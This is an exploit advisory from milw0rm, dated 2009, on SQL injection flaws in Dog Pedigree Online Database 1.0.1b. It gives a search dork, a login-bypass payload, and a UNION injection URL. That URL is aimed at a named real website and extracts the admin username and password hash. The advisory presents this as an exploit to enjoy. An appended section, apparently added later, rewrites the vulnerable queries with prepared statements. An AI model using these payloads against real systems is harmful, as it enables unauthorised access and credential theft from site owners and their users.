Dog Pedigree Online Database 1.0.1b Multiple SQL Injection Vulns - YEnH4ckEr - 05/19/2009

***********************************************************************************************
***********************************************************************************************
**                                                                                           **
**                              [ASCII-art logo]                                             **
**                                                                                           **
**              LONG LIVE SPAIN!...WE WILL WIN THE WORLD CUP!...o.O                          **
**              PROUD TO BE SPANISH!                                                         **
**                                                                                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|                        MULTIPLE SQL INJECTION VULNERABILITIES                              |
|--------------------------------------------------------------------------------------------|
|                  | Dog Pedigree Online Database v1.0.1-Beta |
| CMS INFORMATION: ---------------------------------------------
|
|-->WEB: http://thewhippetarchives.net/twa_is_offline.php
|-->DOWNLOAD: http://sourceforge.net/projects/dogarchive
|-->DEMO: N/A
|-->CATEGORY: Genealogy
|-->DESCRIPTION: This project allows you to set up and maintain a database for
|                collecting (dog) pedigrees. The data will actually be collected...
|-->RELEASED: 2009-01-25
|
| CMS VULNERABILITY:
|
|-->TESTED ON: firefox 3
|-->DORK: inurl:"printable_pedigree.php"
|-->CATEGORY: AUTH-BYPASS / SQL INJECTION (SQLi)
|-->AFFECT VERSION: <= 1.0.1 Beta
|-->Discovered Bug date: 2009-05-08
|-->Reported Bug date: 2009-05-08
|-->Fixed bug date: 2009-05-12
|-->Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/
|-->Author: YEnH4ckEr
|-->mail: y3nh4ck3r[at]gmail[dot]com
|-->WEB/BLOG: N/A
|-->COMMENT: To my girlfriend Marijose... my brother, sister-in-law, parents (and friends xD) for their support.
|-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)
----------------------------------------------------------------------------------------------


#####################
////////////////////

AUTH-BYPASS (SQLi):

////////////////////
#####################


<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-----------
VULN FILE:
-----------


Path  --> [HOME_PATH]/php_users/htdocs/processlogin.php
Lines --> 69-73

...

$sql = sprintf("
    SELECT userId,status,email,seclev FROM $USERS_DB.users
    WHERE username='%s' AND password='%s'",
    $_POST['username'],
    md5($_POST['password']));
...


-----------
EXPLOIT:
-----------


Username='or 1=1#
Password=nothing



################
////////////////

SQL INJECTION:

////////////////
################


This application is completely vulnerable to SQL injection. I only show one example.


-----------
VULN FILE:
-----------


Path  --> [HOME_PATH]/manageperson.php
Var   --> GET var 'personId'
Lines --> 28,29

...

if (empty($currId))
    $currId = $_GET['personId'];

...


Lines --> 164-165

...

$query = "SELECT * FROM person WHERE id=$currId";
$result = mysql_query($query) or die('Query failed: ' . mysql_error());
$line = mysql_fetch_object($result);

...


------
PoC:
------


http://[HOST]/[HOME_PATH]/managePerson.php?personId=-1+UNION+ALL+SELECT+1,version(),user(),database(),version(),user(),database(),version(),user(),database(),11,12%23


Return --> Database version, user and name.


---------
EXPLOIT:
---------


http://www.gavgavclub.ru/tree/managePerson.php?personId=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),user(),database(),version(),user(),database(),version(),user(),database(),11,12+FROM+users+WHERE+userId=2252%23


Return --> username:::password


**Note: Admin user id is 2252 by default




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
##   SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##   GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-19]
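The two vulnerable queries in this advisory, rewritten with prepared statements and input validation, as an added example (not the project's 1.0.2 patch). It assumes an open mysqli connection in $db (a hypothetical name), the same $USERS_DB.users and person tables the vulnerable code uses, and keeps the application's md5() scheme only so the comparison stays like-for-like; unlike the original it does not depend on the magic_quotes_gpc setting listed as Condition-1.

```php
<?php
// Added example: hardened replacements for processlogin.php and managePerson.php.
// $db is assumed to be an open mysqli connection; table/column names follow the advisory.

// processlogin.php, hardened: user values never become part of the SQL text, so the
// username  'or 1=1#  is compared literally and matches no row.
function findUser(mysqli $db, string $usersDb, string $username, string $password): ?array
{
    // $USERS_DB is configuration, not user input, but it is still restricted to an
    // identifier pattern before being placed into the statement.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $usersDb)) {
        throw new InvalidArgumentException('bad database name');
    }
    $stmt = $db->prepare(
        "SELECT userId, status, email, seclev FROM `$usersDb`.users
         WHERE username = ? AND password = ?"
    );
    // md5() kept only to match the stored hashes; a full fix would migrate to
    // password_hash()/password_verify().
    $hash = md5($password);
    $stmt->bind_param('ss', $username, $hash);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;   // null = no match, so the bypass payload fails closed
}

// managePerson.php, hardened: personId must be a positive integer before any query
// runs, and it is bound as an integer, so "-1 UNION ALL SELECT ..." is rejected.
function findPerson(mysqli $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;       // reject outright; never fall back to the raw string
    }
    $stmt = $db->prepare('SELECT * FROM person WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage in the handlers (values come from $_POST / $_GET as in the original):
// $user   = findUser($db, $USERS_DB, $_POST['username'] ?? '', $_POST['password'] ?? '');
// $person = findPerson($db, $_GET['personId'] ?? '');
```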